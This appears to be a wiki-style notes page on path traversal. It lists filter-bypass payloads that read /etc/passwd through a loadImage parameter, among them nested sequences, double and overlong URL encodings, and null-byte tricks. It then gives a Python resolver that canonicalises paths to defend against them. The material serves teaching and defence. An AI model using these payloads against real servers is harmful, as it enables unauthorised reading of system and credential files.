
What is it?

Sometimes a parameter that selects a file to read (local file inclusion / path traversal) is exposed directly to the client:

<img src="/loadImage?filename=218.png">

which can be abused by supplying a relative path

https://insecure-website.com/loadImage?filename=../../../etc/passwd

to 'break out' of the intended image directory and display an arbitrary file the web server can read.

But the parameter may be filtered, so the plain ../ sequence does not get through.

filter bypass

absolute path:

https://insecure-website.com/loadImage?filename=/etc/passwd

bypasses filters that only look for ../ (the path never needs to traverse upwards if it is joined onto the base directory as an absolute path)

nested sequences

https://insecure-website.com/loadImage?filename=....//....//...///etc/passwd

or

https://insecure-website.com/loadImage?filename=....\/....\/....\/etc/passwd

where the filter removes ../ (or ..\) in a single, non-recursive pass: stripping the inner sequence from ....// leaves ../ behind, so the traversal survives the filter

superfluous URL decode

The web server already URL-decodes the query string once; if the application decodes the value a second time, the check runs on the still-encoded form while the file is opened with the decoded one:

%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd    (as sent)
../../../etc/passwd                      (after decoding)

or double encoded, for a filter that itself decodes once before checking:

%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd    (as sent)
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd                      (after first decode)
../../../etc/passwd                                        (after second decode)

or non-standard encodings of the slash, which a strict decoder rejects but a lenient one maps to /:

..%c0%af..%c0%af..%c0%afetc/passwd

(%c0%af is an overlong UTF-8 encoding of /) or

..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd

(%ef%bc%8f is the fullwidth solidus U+FF0F, which some normalisation steps fold to /)

see also filter bypass

Expected base folder:

filename=/var/www/images/../../../etc/passwd

A filter that only checks the supplied value starts with the expected base folder is satisfied, because it inspects the raw string rather than the path it resolves to

use of null byte

When the application requires a .png extension:

filename=../../../etc/passwd%00.png

The extension check sees the full string and passes, while the underlying C-level file API treats the null byte as the end of the string and opens ../../../etc/passwd
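Every bypass on this page defeats a filter that inspects the raw input rather than the path that will actually be opened. The following is an added example (not code from the original page) of a handler-side resolver that decodes once, rejects null bytes, canonicalises, and then checks containment in the base directory, run over the payloads listed above. The base directory /var/www/images and the .png/.jpg allow-list are assumptions; the filename is assumed to arrive as the still-encoded query-string value, so it is decoded exactly once here (if your framework has already decoded it, drop the unquote call, or you recreate the superfluous-decode bug). naive_strip reproduces the single-pass ../ removal that the nested-sequence trick targets.

```python
"""Path-traversal defence: canonicalise first, then check containment.

Added example, not the original page's code. Assumes the image directory is
/var/www/images and that `filename` is the raw (still URL-encoded) query value.
"""
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/images"      # assumed image directory
ALLOWED_EXT = (".png", ".jpg")    # assumed extension allow-list

# Constructed inputs: the payloads from this page plus one benign request.
SAMPLES = [
    "218.png",
    "../../../etc/passwd",
    "/etc/passwd",
    "....//....//....//etc/passwd",
    "....\\/....\\/....\\/etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
    "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
    "..%c0%af..%c0%af..%c0%afetc/passwd",
    "..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd",
    "/var/www/images/../../../etc/passwd",
    "../../../etc/passwd%00.png",
]


def naive_strip(filename):
    """The filter the nested-sequence trick targets: removes '../' in one pass.

    str.replace is non-recursive, so '....//' collapses to '../'.
    """
    return filename.replace("../", "")


def resolve_image(filename, base_dir=BASE_DIR):
    """Return the canonical path to open, or raise ValueError with the reason.

    Checks run in the order a reviewer should expect: decode once, reject
    nulls, canonicalise, containment, then the extension allow-list.
    """
    # 1. Decode exactly once. Decoding again is the superfluous-decode bug.
    decoded = unquote(filename)

    # 2. A null byte terminates the string in C-level file APIs, so an
    #    extension check on the full string would be lying about what opens.
    if "\x00" in decoded:
        raise ValueError("null byte")

    # 3. Join and canonicalise. posixpath.join discards base_dir when the
    #    input is absolute; normpath resolves '..' components. The result
    #    is what the OS would actually open, which is what must be checked.
    candidate = posixpath.normpath(posixpath.join(base_dir, decoded))

    # 4. Containment on the resolved path, not a startswith() on the string:
    #    commonpath() also rejects sibling directories such as
    #    /var/www/images2 that a plain prefix check would accept.
    if posixpath.commonpath([base_dir, candidate]) != base_dir:
        raise ValueError("outside base directory")

    # 5. Allow-list the extension on the canonical path.
    if not candidate.lower().endswith(ALLOWED_EXT):
        raise ValueError("extension not allowed")

    return candidate


def outcome(filename):
    """Resolved path on success, otherwise 'refused: <reason>'."""
    try:
        return resolve_image(filename)
    except ValueError as exc:
        return f"refused: {exc}"


if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:60} -> {outcome(sample)}")
    print("naive_strip on nested sequence ->",
          naive_strip("....//....//....//etc/passwd"))
```

Two outcomes are worth noticing when running it. The nested, double-encoded and non-standard-slash payloads are not refused as traversal at all: once the value is decoded only once and canonicalised, they are simply odd filenames inside the image directory, and only the extension allow-list turns them away. They become dangerous only when a filter rewrites the string (stripping ../, decoding twice, folding U+FF0F to /) before the open. The absolute-path and expected-base-folder payloads, by contrast, are caught precisely because the check runs on the resolved path rather than on the raw value.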

40397ac9 (main) : 2023-01-11T20:40:16+01:00